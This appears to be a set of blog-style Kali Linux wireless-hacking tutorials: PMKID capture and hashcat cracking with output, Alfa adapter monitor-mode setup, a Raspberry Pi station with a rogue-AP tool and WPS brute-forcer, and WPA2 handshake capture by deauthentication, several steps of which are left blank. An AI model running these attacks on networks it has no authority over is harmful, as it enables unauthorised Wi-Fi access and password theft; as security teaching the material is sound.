file application information.: hcxdumptool 5.1.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
WDS packets..................: 2
beacons (with ESSID inside)..: 22
probe requests...............: 22
probe responses..............: 14
association requests.........: 1
association responses........: 1
reassociation responses......: 2
authentications (OPEN SYSTEM): 8
authentications (BROADCOM)...: 8
EAPOL packets................: 8
EAPOL PMKIDs.................: 1
best handshakes..............: 1 (ap-less: 0)

1 PMKID(s) written to cap01.16800
root@GalaxyS9:~/hashcat#

4.3 Validate the hash

cat cap01.16800

root@GalaxyS9:~/hashcat# cat cap01.16800
4a12770f5a10315f7a8a6e9cd311c9ca*1cb72c843c70*b0ca68623d4f*506f6e747553
root@GalaxyS9:~/hashcat# 

4.4 Crack the formatted pcapng with hashcat

./hashcat -m 16800 cap01.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

[s]tatus [p]ause [b]ypass heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 9ba69e3487f514214f1e0fa61ab78fb1*08863bdd2c95*a46cf...323464
Time.Started.....: Sun Dec 23 22:02:53 2018 (3 mins, 2 secs)
Time.Estimated...: Sun Dec 23 22:20:42 2018 (14 mins, 47 secs)
Guess.Mask.......: '?l?l?l?l?l?lt!' [10]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   289.5 kH/s (51.84ms) @ Accel:256 Loops:64 Thr:256 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 52101120/308915776 (16.87%)
Rejected.........: 0/52101120 (0.00%)
Restore.Point....: 52101120/308915776 (16.87%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3456-3520
Candidates.#1....: 'lwybcot!' -> 'yymytht!'
Hardware.Mon.#1..: Temp: 77c Fan: 55% Util: 99% Core:1822MHz Mem:4006MHz Bus:16

For a more detail guide on how to use hashcat please see the guide on how to use hashcat in windows.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Install ALFA AWUS1900 Kali Linux 2018.4

How To Install ALFA AWUS1900 Kali Linux 2018.4

Install ALFA AWUS1900 Kali Linux.

Alfa AWUS1900 is a quad antenna 802.11ac Wi-Fi USB receiver boasting router connection speeds of up to 1900 Mbps (1300 Mbps for 5 Ghz + 600 Mbps for 2.4 Gz).

It is compatible with Microsoft Windows 7, 8/8.1, and Windows 10, connects to the OS by USB 3.

Four transmit/four receive (4T4R) dual band antenna allows utilization of both 2.4 and 5 Ghz radio bands on 802.11ac routers for a combined max connect rate of 1900 mbps.

The antennas can be detached and extended or upgraded.

Step 1: Update the system

1.1 Update and upgrade

sudo apt-get update && apt-get upgrade

1.2 Update dependence

sudo apt-get dist-upgrade -y

Step 2: Install Chipset Drivers

2.1 Before we begin to install ALFA AWUS1900, confirm that the network card is connect to Kali Linux by displaying USB connected devices

sudo lsusb

root@GalaxyS9:~# sudo lsusb
Bus 004 Device 002: ID 0bda:8813 Realtek Semiconductor Corp. 
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 005: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 004: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 003: ID 0e0f:0008 VMware, Inc. 
Bus 002 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
root@GalaxyS9:~# 

2.2 Install realtek chipset RTL8814U drivers

sudo apt install realtek-rtl88xxau-dkms

2.3 Reboot and reconnect

sudo reboot

2.4 Confirm that the card is installed and running

sudo ifconfig

root@GalaxyS9:~# sudo ifconfig 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.128  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::20c:29ff:fed0:e17a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:d0:e1:7a  txqueuelen 1000  (Ethernet)
        RX packets 193  bytes 21265 (20.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 58  bytes 4527 (4.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 28  bytes 1596 (1.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28  bytes 1596 (1.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 5a:00:35:a3:b4:70  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@GalaxyS9:~# 

sudo iwconfig

root@GalaxyS9:~# sudo iwconfig
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=18 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~# 

2.5 If the above don’t work then install the packets bellow.

In the git directory you will find a dkms installation script, execute the script to fix the installation.

sudo apt install dkms &&
sudo apt-get install bc &&
sudo apt-get install build-essential && 
sudo apt-get install linux-headers-$(uname -r)
sudo git clone https://github.com/aircrack-ng/rtl8812au

Step 3: Set The Card In Monitor Mode

3.1 You have to set the monitor mode manually on the AWUS036ACH & AWUS1900

## Set interface down
sudo ip link set wlan0 down

## Set monitor mode
sudo iwconfig wlan0 mode monitor

## Set interface up
sudo ip link set wlan0 up

3.2 Confirm monitor mode

sudo iwconfig

root@GalaxyS9:~# iwconfig
wlan0     IEEE 802.11  Mode:Monitor  Frequency:5.3 GHz  Tx-Power=18 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~# 

3.3 Test the card by sniffing nearby networks

sudo airodump-ng wlan0

CH  7 ][ Elapsed: 1 min ][ 2018-12-23 17:32                                         
                                                                                                                                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 84:C9:B2:6A:9E:90  -49        6        0    0   1  130  WPA2 CCMP   PSK  HonnyP01                                                                                                                                                   root@GalaxyS9:~# 

3.4 Changing adapter back to manged mode

## Set interface down
sudo ip link set wlan0 down

## Set managed mode
sudo iwconfig wlan0 mode managed

## Set interface up
sudo ip link set wlan0 up

Step 4: Optional Commands

4.1 Change TX power

sudo iwconfig wlan0 txpower 30

## OR

sudo iw wlan0 set txpower fixed 3000

4.2 Set channel manually

## Set channel 6, width 40 MHz: 
sudo iw wlan0 set channel 6 HT40-

## Set channel 149, width 80 MHz:
sudo iw wlan0 set freq 5745 80 5775

Conclusion

We have installed ALFA AWUS1900 on Kali Linux and change the mode to monitor mode on the network card

Check out the Ethical Hacking notes for more Kali Linux quick guides.




How To Setup A Kali Linux Hacking Station On Raspberry Pi 3 Model B+

In this quick guide we are installing A Kali Linux Hacking Station On Raspberry Pi 3 Model B+.

To access the hacking station we are enabling SSH and auto longing for lightdm, for remote desktop connection i am installing Vino VCN.

Last we are installing and configuring WiFI Pumpkin a rouge access point platform.

Step 1: Download and Install Kali Linux Image

1.1 Download Kali Linux official Raspberry Pi image.

1.2 Extract the image from the zip file to a local folder.

1.3 Download and run Win32DiskImager our a similar application to load the image on the SD card.

1.4 Insert the SD card to the Raspberry Pi and power on the device.

Step 2: Connect to Kali Linux With SSH

2.1 Connect the Raspberry Pi to the LAN.

2.2 Scan your local network with Nmap to get the Raspberry’s IP address.

2.3 Start Putty and connect to the Kali Linux.

2.4 The default credentials is root for login and toor for the password.

Step 3: Configure Kali Linux

3.1 Change the root user password.

sudo passwd root

root@kali:/# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@kali:/#

3.2 First update installed packages.

sudo apt-get update -y

3.3 Next upgrade installed packages.

sudo apt-get upgrade -y

3.4 Finally upgrade dependencies.

sudo apt-get dist-upgrade -y

Step 4: Enable Auto login Lightdm

4.1 Display default manager service.

sudo cat /etc/X11/default-display-manager

root@kali:~# cat /etc/X11/default-display-manager
/usr/sbin/lightdm
root@kali:~# 

4.2 Edit configuration file for lightdm.

sudo nano /etc/lightdm/lightdm.conf

4.3 Delete the comment characters (“#”) and change the autologin user to be “root”.

    autologin-user=root
    autologin-user-timeout=0

Exit & Save

4.4 Edit the PAM configuration file for lightdm.

sudo nano /etc/pam.d/lightdm-autologin

4.5 Remove the hash “#” in the line below.

# Allow access without authentication
auth      required pam_succeed_if.so user != root quiet_success

# Allow access without authentication
##auth      required pam_succeed_if.so user != root quiet_success

Exit & Save

4.6 Use the settings menu on the desktop to turn off the power savings options and lock screen options.

4.7 Reboot Kali Linux.

sudo reboot

4.8 Confirm that auto login is successful.

Step 5: Install Vino VNC server

5.1 Install the Vino VNC server.

sudo apt-get install vino -y 

5.2 Download and run the script below to configure the Vino server installation.

NOTE: Edit the script and change the password.

sudo git clone https://gist.github.com/jasonadsit/3a836c60f010bf655f82a99064341993

# Download and unpack the script and run the commands bellow

sudo cd 3a836c60f010bf655f82a99064341993
sudo nano fix-kali-vnc.sh
sudo chmod +x fix-kali-vnc.sh
sudo ./fix-kali-vnc.sh

NOTE: The Scrip will reboot the server when it is finished.

5.3 The installation script will create a auto start file for VINO “vino-server.desktop”.

## You can find the file in the directory bellow

sudo /root/.config/autostart/vino-server.desktop

5.4 Display listing sockets, Vino listening port is TCP port 5900.

sudo netstat -tupln

root@kali:~# sudo netstat -tupln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      454/sshd
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      555/vino-server
tcp6       0      0 :::22                   :::*                    LISTEN      454/sshd
tcp6       0      0 :::5900                 :::*                    LISTEN      555/vino-server
udp        0      0 0.0.0.0:68              0.0.0.0:*                           402/dhclient

5.5 Edit the desktop resolution on startup, open the “boot” directory and edit the “config.txt” file.

cd /boot/

sudo nano config.txt

5.6 Uncomment the “framebuffer_width” and the “framebuffer_height” parameter and set the resolution to 1024.

framebuffer_width=1900

## framebuffer_height
##     Console framebuffer height in pixels. Default is display height minus
##     overscan.
##
framebuffer_height=1024

Exit & Save

5.7 Reboot the device.

5.8 Confirm that the VNC server is working by connecting to the server with a VNC client.

Step 6: Configure WiFi Connection

6.1 Edit the network/interfaces configuration file.

sudo /etc/network/interfaces

# Add the code bellow. (Remove quotes)

auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-ssid "YourNetworkName"
wpa-psk "YourPassword"

Exit & Save

6.2 Reboot once more.

sudo reboot

Optional 1 : Install WiFi Pumpkin Rouge AP

1.1 Install WiFi Pumpkin dependencies.

sudo apt install -y python-pip
sudo pip install service_identity
sudo pip install scapy_http
sudo apt install mitmproxy

1.2 Download WiFi-Pumpkin.

sudo git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

1.3 Open WiFi Pumpkin directory.

cd WiFi-Pumpkin/

1.4 Add permission to the installer file.

sudo chmod +x installer.sh

1.5 Run the installer script.

sudo ./installer.sh --install

1.6 Run the WiFi-Pumpkin application.

sudo wifi-pumpkin

Optional 2: Install Bully

https://github.com/aanarchyy/bully

2.1 Install Pixiewps dependence.

sudo apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps

2.2 Download Bully.

sudo git clone https://github.com/aanarchyy/bully

2.3 Build the application.

cd bully*/
cd src/
sudo make

2.4 Install bully.

sudo make install

Optional 3: Install Full Kali Linux ‘Image

3.1 The process can take up to 6 hours and you need a 32 GB SD card.

sudo apt-get install kali-linux-full

Conclusion

We have installed a Kali Linux Hacking Station on Raspberry Pi 3 Model B+, enabled SSH and remote “desktop” connection.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




How To Capturing WPA2-PSK Handshake Kali Linux 2018.4

In this lab i will show how to capture the WPA2 4 way handshake using Kali Linux and using hashcat to crack the captured file.

DISCLAIMER: This software/tutorial is for educational purposes
only. It should not be used for illegal activity. The author is not
responsible for its use or the users action.

Step 1: Enable Monitor Mode On a Supported WiFi Card

1.1.a Display wireless card





1.2 Enable monitoring mode





1.3 Display the new created virtual interface called wlan0mon





Step  2: Use Airodump To Capture Packets

2.1.a Start sniffing nearby trafic



Use the command below to sniff nearby trafic and save the captured packets in to a file



2.1.b Let it run a while and close the capture, the file will contain the bssid address and the channel

Step 3: Capture The WPA2-PSK Handshake

3.1 Use airodump-ng to record the traffic from a specific access point, copy the BSSID and the channel number from the file that we created in the last step



3.2.a Open a new terminal window and launch a deauth attack with aireplay-ng



3.2.b Go back to terminal 1, stop the capture when you capture the wpa handshake



3.2.c Stop the deauth attack in terminal 2

3.3.a Confirm the captured handshake with aircrack-ng





Step 4: Convert The Captured Cap File

4.1 The captured .cap file needs to be to hccapx format to be cracked, the hashcat team have created a site where you can upload and convert a WPA / WPA2 pcap capture file to a hashcat capture file.

Open https://hashcat.net/cap2hccapx/ and upload the file.

Please fallow the guide on how to crack the formatted file using hashcat in windows.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Install Kismet Kali Linux 2018.4

Step 1: Update And Install Dependencies

1.1.a Upgrade / Update



1.2.a Install  dependencies



1.2.b Install libusb



1.3.a Install Python add-ons



Step 2: Install And Configure Kismet

2.1.a Clone the repository and go to kismet directory





2.2.a Configure the installation



2.2.b Create the installation 



2.2.c Start the installation



Step 3: Start Kismet (ALFA AWUS1900)

3.1.a Put Your Wireless Card in Monitor Mode



3.1.b Start Kismet web UI





3.1.c Start Kismet with wlan0